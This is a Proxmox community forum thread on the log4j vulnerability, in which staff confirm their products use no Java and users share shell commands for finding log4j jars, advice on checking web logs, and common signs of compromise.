log4j exploit - what to do??

aaron

Proxmox Staff Member
Staff member
Jun 3, 2019
2,874
446
88
So my question is, does Proxmox also use this package?
There is no Java used on the Proxmox VE side of things.
Proxmox VE is mostly written in Perl, with some daemons in C and Rust. The same goes for the Mail Gateway. The Proxmox Backup Server is written primarily in Rust.

Since our products are all open source, feel free to check out the source code at https://git.proxmox.com/

This is of course only valid for a standard installation. If you did install some 3rd party software that is using Java, you might be affected. A first step to figure that out would be to check for any java processes running. I think
Code:
ps auxwf | grep java
should do the trick.
Edit: Though that would also give results if you have some java running inside a container. Check who the owner is.
 
Last edited:

binaryanomaly

Member
May 11, 2018
22
0
6
43
There is no Java used on the Proxmox VE side of things.
Proxmox VE is mostly written in Perl, with some daemons in C and Rust. The same goes for the Mail Gateway. The Proxmox Backup Server is written primarily in Rust.

Since our products are all open source, feel free to check out the source code at https://git.proxmox.com/

This is of course only valid for a standard installation. If you did install some 3rd party software that is using Java, you might be affected. A first step to figure that out would be to check for any java processes running. I think
Code:
ps auxwf | grep java
should do the trick.
Edit: Though that would also give results if you have some java running inside a container. Check who the owner is.
Great, thanks for the swift response @aaron

XenForo might be impacted though:
https://xenforo.com/community/threa...h-and-more-via-apache-log4j-log4shell.201145/
 

crally

New Member
Aug 9, 2020
14
3
3
29
Hi,

there is a good command to proof, if your machines are affected:

Code:
sudo find / -name log4j-core-*.jar

Sometimes the lib is packed into a *.jar file. To proof this you can use:

Code:
sudo find / -name \*.jar -exec sh -c "if zipinfo {} | grep JndiLookup.class; then echo -e '{}\n'; fi" \; 2>/dev/null


put the commands into the proxmox shell. This will proof your containers, too. For the virtual machines you need to put the commands into there shells.
As you can see, my unifi controller (CT 106) was affected. A simple apt update && apt upgrade did the trick for this. It's now at version 2.15
 

Attachments

  • Unbenannt.PNG
    Unbenannt.PNG
    14.7 KB · Views: 76

mahofst

New Member
Nov 26, 2021
7
1
3
31
Where would I check for possible attacks (on CTs /VMs) ?
Is there some default log active, that I would check, and what would I look out for?

(I really dont think what I administrate was attacked inside VPN and with only neo4j using log4j, but I'm curious)
 

crally

New Member
Aug 9, 2020
14
3
3
29
I think that would be difficult. You could search all log files for the attackers command (don't know if I am allowed to post it). But since it could be, that the attacker deleted the log entry's you cannot be sure if your system is injected with something....
But maybe someone else has an idea.
 

oguz

Proxmox Staff Member
Staff member
Nov 19, 2018
5,025
634
118
Where would I check for possible attacks (on CTs /VMs) ?
Is there some default log active, that I would check, and what would I look out for?
in your web logs mainly. most exploit attempts are sending HTTP requests with the malicious payload inside some header (User-Agent is common, along with some other ones).

if you search online you can find fail2ban filter rules ;) [0]

just look out for common signs of compromise if you have doubts:
* new users on the system
* unfamiliar processes taking a lot of resources
* weird cron jobs
* missing/deleted logs
and the regular stuff.

although if you're not using any java you shouldn't have to worry about it :)

from our stack there's nothing we use java with, so default installations are safe as mentioned before...

[0]: https://github.com/atnetws/fail2ban-log4j/blob/main/apache-jndi.conf
 
Last edited:
  • Like
Reactions: janssensm

About

The Proxmox community has been around for many years and offers help and support for Proxmox VE, Proxmox Backup Server, and Proxmox Mail Gateway.
We think our community is one of the best thanks to people like you!

Get your subscription!

The Proxmox team works very hard to make sure you are running the best software and getting stable updates and security enhancements, as well as quick enterprise support. Tens of thousands of happy customers have a Proxmox subscription. Get your own in 60 seconds.

Buy now!